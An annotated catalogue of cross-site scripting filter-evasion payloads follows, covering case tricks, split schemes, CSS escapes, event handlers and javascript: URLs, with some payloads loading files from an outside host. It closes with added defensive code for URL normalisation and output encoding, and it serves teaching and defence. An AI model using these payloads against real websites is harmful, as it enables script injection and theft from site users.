1. Change the case of the characters

A filter that matches the literal string "<script>" (or "javascript") case-sensitively misses the same tag in mixed case; the HTML tokenizer does not care.

<sCript>alert('d')</scRipT>
2. Pad the tag with extra characters to evade a regular-expression check

A regex that assumes a tag ends at the first ">" stops at the one inside the quoted attribute value and never sees the SRC attribute that follows; the browser's tokenizer keeps a ">" inside a quoted value as part of the value.

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another extension in place of .js

The browser runs whatever the response body contains regardless of the file name; a filter that only flags "*.js" sources learns nothing from the extension. (Only a server that sends a non-script Content-Type together with X-Content-Type-Options: nosniff will stop this.)

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

A javascript: URL inside url() only ran in old versions of IE; current browsers ignore it.
5. Insert other characters inside the script tag

The HTML tokenizer ends the tag name at "/" as well as at whitespace, so the tag name is still SCRIPT, but a regex written as "<script\s+src" never matches.

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a new line to evade

Browsers strip ASCII tab, LF and CR from a URL before parsing it, so the scheme still reads "javascript:" even though no single substring of the attribute spells it.

<img src="jav ascr ipt:alert('XSS3')">   (the gaps inside "javascript" are tab characters)

<img src="jav ascr ipt:alert('XSS3')">   (the gaps inside "javascript" are new lines)

<IMG SRC="jav ascript:alert('XSS');">
7. Use "\" to evade

In CSS a backslash escapes the character that follows it, so "expre\ssion" and "\ja\vasc\ript" still read as "expression" and "javascript" to the CSS parser; a "/* */" comment in the middle of a keyword is removed the same way. expression() itself is an old-IE feature.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

In CSS a backslash followed by hex digits is a character escape ("\73" is "s"), so the value below can be written entirely without the letters the filter looks for. In HTML attributes, numeric character references such as "&#x6A;" ("j") are decoded before the URL is parsed, and browsers accept them without the trailing semicolon.

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
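Items 6, 7 and 8 all work because the browser normalises a URL before it decides what scheme it has, while the filter matches the raw text. The validator below, added here as an example and not part of the original post, does the same normalisation first (strip ASCII tab/LF/CR, decode HTML numeric references with or without the ";", drop leading control characters, lowercase) and only then checks the scheme against an allow list. All function names and the sample URLs are this example's own; the samples are constructed from the techniques above.

```javascript
// Added example (not from the original post): validate a URL-valued attribute
// the way the browser will actually interpret it, instead of regex-matching the
// raw text. The sample URLs below are constructed for this example.

// Decode HTML numeric character references. The trailing ';' is optional
// because browsers accept '&#106avascript:' as well as '&#106;avascript:'.
// Code points above U+10FFFF are replaced with U+FFFD rather than throwing.
function decodeNumericEntities(s) {
  const fromCode = (n) => (n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromCode(parseInt(dec, 10)));
}

// Browsers remove ASCII tab, LF and CR from anywhere in a URL before parsing
// it, so "jav<TAB>ascript:" and "jav<LF>ascript:" both become "javascript:".
function stripUrlWhitespace(s) {
  return s.replace(/[\t\n\r]/g, '');
}

// Leading C0 controls and spaces are ignored before the scheme, and schemes
// are case-insensitive, so "\x01JaVaScRiPt:" is still "javascript:".
function normalizeUrl(raw) {
  return stripUrlWhitespace(decodeNumericEntities(raw))
    .replace(/^[\x00-\x20]+/, '')
    .toLowerCase();
}

// Allow list of schemes the application is willing to put into src/href.
const ALLOWED_SCHEMES = new Set(['http', 'https']);

// True for relative URLs and for absolute URLs whose scheme is allowed.
function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  if (!m) return true; // no scheme: relative URL such as /img/logo.png
  return ALLOWED_SCHEMES.has(m[1]);
}

// The kind of check the payloads in this post are written to get past.
function naiveIsSafeUrl(raw) {
  return !/^javascript:/.test(raw);
}

// Constructed samples: the first four are variants of items 1, 6 and 8 above.
const SAMPLE_URLS = [
  'jav\tascript:alert(1)',         // literal tab inside the scheme (item 6)
  'jav&#x09;ascript:alert(1)',     // the same tab as a hex reference (item 8)
  '&#106avascript:alert(1)',       // decimal reference, no semicolon (item 8)
  ' \x01JaVaScRiPt:alert(1)',      // leading control char plus mixed case (item 1)
  'https://example.com/a.js',      // legitimate absolute URL
  '/images/logo.png',              // legitimate relative URL
];

// Returns the sample URLs that the naive check accepts but the normalising
// check rejects, i.e. the filter bypasses.
function naiveCheckBypasses() {
  return SAMPLE_URLS.filter((u) => naiveIsSafeUrl(u) && !isSafeUrl(u));
}

for (const u of SAMPLE_URLS) {
  console.log(JSON.stringify(u), 'naive:', naiveIsSafeUrl(u), 'normalised:', isSafeUrl(u));
}
```

Running it shows the four attack variants accepted by naiveIsSafeUrl and rejected by isSafeUrl, while the two legitimate URLs pass both. The entity decoding step is only needed when the check runs on raw attribute text; a value taken from the DOM has already been decoded by the HTML parser, and the tab/LF/CR stripping and scheme comparison must still be applied.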
9. Script in an HTML tag (event handlers)

No script tag is needed at all: any on* attribute runs its value as script when the event fires. A filter that only looks for "<script" never sees these.

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

(Many names in this list are IE-specific; the point is that the attribute name only has to start with "on".)
10. XSS code inside an .swf

The Flash movie calls back into the page; AllowScriptAccess="always" is what lets it run script in the embedding document. Flash is no longer supported by any current browser.

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it

The IMG tag is split across two CDATA sections (or around a comment) so that no single string on the page contains "javascript:"; IE's XML data island plus DATASRC/DATAFLD/DATAFORMATAS=HTML then renders the reassembled value as HTML. This is an IE-only mechanism.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

IE's HTML+TIME behaviour lets a t:set element assign innerHTML, so the script tag arrives as entity-encoded text inside an attribute value and is only turned into markup when the assignment runs. IE-only.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
13. Write a cookie via META

This sets a cookie whose value is a script tag; it pays off against a page that later writes the cookie value into its HTML without encoding it. Current browsers ignore http-equiv="Set-Cookie".

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href, url

Any attribute that takes a URL is a candidate. Of the vectors below, IFRAME/FRAME SRC still runs javascript: in current browsers; IMG SRC/DYNSRC/LOWSRC, LINK HREF, TABLE BACKGROUND and CSS url() only did so in old IE.

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
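What the whole list has in common is that every entry beats a filter which tries to recognise the attack in the raw text. The following is an added example, not code from the original post: two blacklist filters of the kind these payloads are written for, beside plain output encoding for the HTML text and attribute contexts, which does not try to recognise anything. The function names are this example's own and the PAYLOADS array is constructed from items 1, 2, 5, 9 and 14 above.

```javascript
// Added example (not the original post's code): blacklist filtering versus
// output encoding, run over payloads constructed from the techniques above.

const PAYLOADS = [
  '<sCript>alert("d")</scRipT>',           // item 1: case variation
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',    // item 2: '>' hidden inside an attribute value
  '<SCRIPT/SRC="t.js"></SCRIPT>',          // item 5: '/' where the regex expects whitespace
  '<body onload="alert(1)">',              // item 9: event handler, no script tag
  '<IMG DYNSRC="javascript:alert(1)">',    // item 14: javascript: URL, no script tag
];

// Filter v1: strip a literal <script> / </script>. Case-sensitive, so the
// mixed-case tag of item 1 passes straight through, and so does everything else.
function filterV1(s) {
  return s.replace(/<\/?script>/g, '');
}

// Filter v2: case-insensitive and tolerant of attributes after whitespace.
// It neutralises items 1 and 2, but "<SCRIPT/SRC" has no whitespace after the
// tag name (only its end tag is removed), and items 9 and 14 never contain a
// script tag at all.
function filterV2(s) {
  return s.replace(/<\/?script(\s[^>]*)?>/gi, '');
}

// Output encoding for the HTML text and double-quoted attribute contexts:
// every character that can open a tag or close an attribute is replaced, so
// the browser only ever sees data. Encoding is per context; a value going into
// a URL attribute, a script block or a style block needs that context's rules
// (the javascript: and expression() entries above are exactly those cases).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// How many payloads still contain a '<' after the given transform, i.e. can
// still open a tag when written into an HTML page.
function countStillMarkup(transform) {
  return PAYLOADS.filter((p) => transform(p).includes('<')).length;
}

for (const [name, fn] of [['filterV1', filterV1], ['filterV2', filterV2], ['encodeForHtml', encodeForHtml]]) {
  console.log(name, 'leaves', countStillMarkup(fn), 'of', PAYLOADS.length, 'payloads able to open a tag');
}
```

filterV1 leaves all five payloads intact, filterV2 leaves three, and encodeForHtml leaves none, because it never needs to know what an attack looks like. Each new filter version closes the payloads its author had seen; encoding the output for the context it lands in closes the class.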